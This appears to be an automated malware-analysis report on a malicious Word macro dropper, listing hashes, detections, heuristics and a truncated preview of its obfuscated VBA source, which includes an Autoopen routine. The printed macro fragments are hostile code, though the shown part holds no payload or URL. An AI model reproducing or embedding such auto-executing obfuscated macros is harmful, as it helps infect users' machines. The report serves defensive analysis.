Office (OLE) malware analysis — malicious · 84be1f70469a6a14

MALICIOUS

Office (OLE)

164.0 KB Created: 2018-04-26 19:41:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: 39df97f22c3cfb79b2d3f6661607a203 SHA-1: 822835366ce9adc3646dcf07e80b0fc52bf86d92 SHA-256: 84be1f70469a6a144eb43543644d395beb8ee83a5a5d67a7642357c35d266a0d

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The presence of an AutoOpen macro and a Shell() call strongly suggests that the macros are designed to execute arbitrary code. ClamAV detection as 'Doc.Dropper.Agent-6528427-0' further supports its malicious nature as a dropper. The obfuscated VBA code prevents a detailed analysis of the payload, but the intent is clearly to download and execute a second-stage payload.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6528427-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6528427-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 54066 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	54066 bytes
SHA-256: `d500d7e720216c380c18f837a061b79ff862782fb8573194096f265083b85a42`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "QXoiYBp" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub nSwOU(wiDFU) Select Case vPMPSq Case 58035 DwwEh = wjQuF DLBLc = Round(73527) Xqvwl = Hex(KGYVcX - ChrW(CvIpWr)) CaRNIA = ojOBnj Case 42368 bHBKI = CByte(44258) YLoWb = Log(ICLok) End Select End Sub Sub RzYhn(wWWJTo) Select Case HwTAnL Case 68263 rBGYl = fjhCM bEIDZ = Round(26659) JApPr = Hex(fTWoBY - ChrW(BtawSI)) LTppG = mPDoQ Case 51879 mZJCm = CByte(28941) FFIrf = Log(kBhdMk) End Select Select Case LNqKA Case 16360 NQQiYa = qbkYJD wGKwJc = Round(43827) iZcfJN = Hex(jwCii - ChrW(poZTE)) tZzFCh = PHfMqj Case 26110 hqGsQl = CByte(35245) lWfYXG = Log(lfFzd) End Select Select Case kUZzc Case 97107 EmLzR = HwTant hMjWJK = Round(17322) uhkikQ = Hex(WjuomB - ChrW(zKhHnw)) RESDB = YlDoSp Case 53302 EbPjT = CByte(20176) mfwGau = Log(YoBWK) End Select End Sub Sub ccSii(ZkdGWz) Select Case dujSa Case 37857 rfYTzb = LMOmvi hcIkz = Round(62718) rJZcJA = Hex(TpVbD - ChrW(izEwh)) DNXOT = STwRai Case 55283 CAWzqn = CByte(52339) sXsLr = Log(ckYKC) End Select Select Case dXTuGB Case 82174 TBPnwQ = ibEIt kVAWHj = Round(19890) MtPjlJ = Hex(jbtpzu - ChrW(qHFNbn)) JTBILs = TYwSj Case 79881 HzGMG = CByte(79644) zLSwlk = Log(sRuHWt) End Select End Sub Sub Autoopen() On Error Resume Next Select Case aOYaQ Case 55335 DuWQE = jHwAVw JHiLZ = Round(15434) aGDLK = Hex(Ejlimp - ChrW(kvQwj)) tvkStl = ttTfM Case 1602 FmwrL = CByte(12999) mCWPO = Log(lPOqmf) End Select AHWBTKoP (OcpoJZ + vAWVCvpE + CLNGWl) Select Case HwwZlZ Case 46713 sODfF = dfcshI dwIhlU = Round(11037) oQtdzi = Hex(PQBGU - ChrW(jakiT)) YjlNo = miBqsz Case 9062 iDwJC = CByte(12263) NPLrb = Log(mtVXCS) End Select End Sub Sub jvDCE(NAPYXC) Select Case Bdjcb Case 54317 sLQZW = pAkfS hkljAw = Round(9773) tGzqo = Hex(ZlINtw - ChrW(EbViif)) KMQjGh = RQtjj Case 42377 UmNZl = CByte(64348) ErXmWP = Log(IQFVQN) End Select Select Case jqOkGU Case 16986 PhNaA = pHEtwD VszkS = Round(85162) zoKPI = Hex(nvzpiN - ChrW(icpYvP)) TJAcSK = KzQAnb Case 1429 bXzSS = CByte(94070) HOOlYW = Log(DYoDAo) End Select Select Case nhzzvc Case 96179 prliNB = bdwua lOjlP = Round(34386) sMkbMf = Hex(pzUWUv - ChrW(ZXzuJ)) kwKGFN = BTRMjK Case 6854 cGJRhN = CByte(56204) JZaicM = Log(jqFZJv) End Select End Sub Sub dWwrm(iHqJr) Select Case wQqdcf Case 14191 BhiiL = bkVblt bcnSqa = Round(13484) BjRnuP = Hex(qNduCb - ChrW(wrPjzu)) lPYwnV = CKlEAZ Case 99841 NvQaAt = CByte(16442) qrTbfw = Log(KcMwP) End Select End Sub Attribute VB_Name = "toHtmoDrqC" Sub AwiTP(tEdRh) Select Case TtIGG Case 53447 ndkiTG = jOFFG pSbhR = Round(67985) FTrmCL = Hex(ozdhwP - ChrW(OXPUK)) GqizX = hRASb C ... (truncated)

SHA-256: d500d7e720216c380c18f837a061b79ff862782fb8573194096f265083b85a42

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "QXoiYBp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub nSwOU(wiDFU)
Select Case vPMPSq
         Case 58035
            DwwEh = wjQuF
            DLBLc = Round(73527)
            Xqvwl = Hex(KGYVcX - ChrW(CvIpWr))
            CaRNIA = ojOBnj
         Case 42368
            bHBKI = CByte(44258)
            YLoWb = Log(ICLok)
End Select
End Sub
Sub RzYhn(wWWJTo)
Select Case HwTAnL
         Case 68263
            rBGYl = fjhCM
            bEIDZ = Round(26659)
            JApPr = Hex(fTWoBY - ChrW(BtawSI))
            LTppG = mPDoQ
         Case 51879
            mZJCm = CByte(28941)
            FFIrf = Log(kBhdMk)
End Select
Select Case LNqKA
         Case 16360
            NQQiYa = qbkYJD
            wGKwJc = Round(43827)
            iZcfJN = Hex(jwCii - ChrW(poZTE))
            tZzFCh = PHfMqj
         Case 26110
            hqGsQl = CByte(35245)
            lWfYXG = Log(lfFzd)
End Select
Select Case kUZzc
         Case 97107
            EmLzR = HwTant
            hMjWJK = Round(17322)
            uhkikQ = Hex(WjuomB - ChrW(zKhHnw))
            RESDB = YlDoSp
         Case 53302
            EbPjT = CByte(20176)
            mfwGau = Log(YoBWK)
End Select
End Sub
Sub ccSii(ZkdGWz)
Select Case dujSa
         Case 37857
            rfYTzb = LMOmvi
            hcIkz = Round(62718)
            rJZcJA = Hex(TpVbD - ChrW(izEwh))
            DNXOT = STwRai
         Case 55283
            CAWzqn = CByte(52339)
            sXsLr = Log(ckYKC)
End Select
Select Case dXTuGB
         Case 82174
            TBPnwQ = ibEIt
            kVAWHj = Round(19890)
            MtPjlJ = Hex(jbtpzu - ChrW(qHFNbn))
            JTBILs = TYwSj
         Case 79881
            HzGMG = CByte(79644)
            zLSwlk = Log(sRuHWt)
End Select
End Sub
Sub Autoopen()
On Error Resume Next
Select Case aOYaQ
         Case 55335
            DuWQE = jHwAVw
            JHiLZ = Round(15434)
            aGDLK = Hex(Ejlimp - ChrW(kvQwj))
            tvkStl = ttTfM
         Case 1602
            FmwrL = CByte(12999)
            mCWPO = Log(lPOqmf)
End Select
AHWBTKoP (OcpoJZ + vAWVCvpE + CLNGWl)
Select Case HwwZlZ
         Case 46713
            sODfF = dfcshI
            dwIhlU = Round(11037)
            oQtdzi = Hex(PQBGU - ChrW(jakiT))
            YjlNo = miBqsz
         Case 9062
            iDwJC = CByte(12263)
            NPLrb = Log(mtVXCS)
End Select
End Sub
Sub jvDCE(NAPYXC)
Select Case Bdjcb
         Case 54317
            sLQZW = pAkfS
            hkljAw = Round(9773)
            tGzqo = Hex(ZlINtw - ChrW(EbViif))
            KMQjGh = RQtjj
         Case 42377
            UmNZl = CByte(64348)
            ErXmWP = Log(IQFVQN)
End Select
Select Case jqOkGU
         Case 16986
            PhNaA = pHEtwD
            VszkS = Round(85162)
            zoKPI = Hex(nvzpiN - ChrW(icpYvP))
            TJAcSK = KzQAnb
         Case 1429
            bXzSS = CByte(94070)
            HOOlYW = Log(DYoDAo)
End Select
Select Case nhzzvc
         Case 96179
            prliNB = bdwua
            lOjlP = Round(34386)
            sMkbMf = Hex(pzUWUv - ChrW(ZXzuJ))
            kwKGFN = BTRMjK
         Case 6854
            cGJRhN = CByte(56204)
            JZaicM = Log(jqFZJv)
End Select
End Sub
Sub dWwrm(iHqJr)
Select Case wQqdcf
         Case 14191
            BhiiL = bkVblt
            bcnSqa = Round(13484)
            BjRnuP = Hex(qNduCb - ChrW(wrPjzu))
            lPYwnV = CKlEAZ
         Case 99841
            NvQaAt = CByte(16442)
            qrTbfw = Log(KcMwP)
End Select
End Sub

Attribute VB_Name = "toHtmoDrqC"
Sub AwiTP(tEdRh)
Select Case TtIGG
         Case 53447
            ndkiTG = jOFFG
            pSbhR = Round(67985)
            FTrmCL = Hex(ozdhwP - ChrW(OXPUK))
            GqizX = hRASb
         C
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.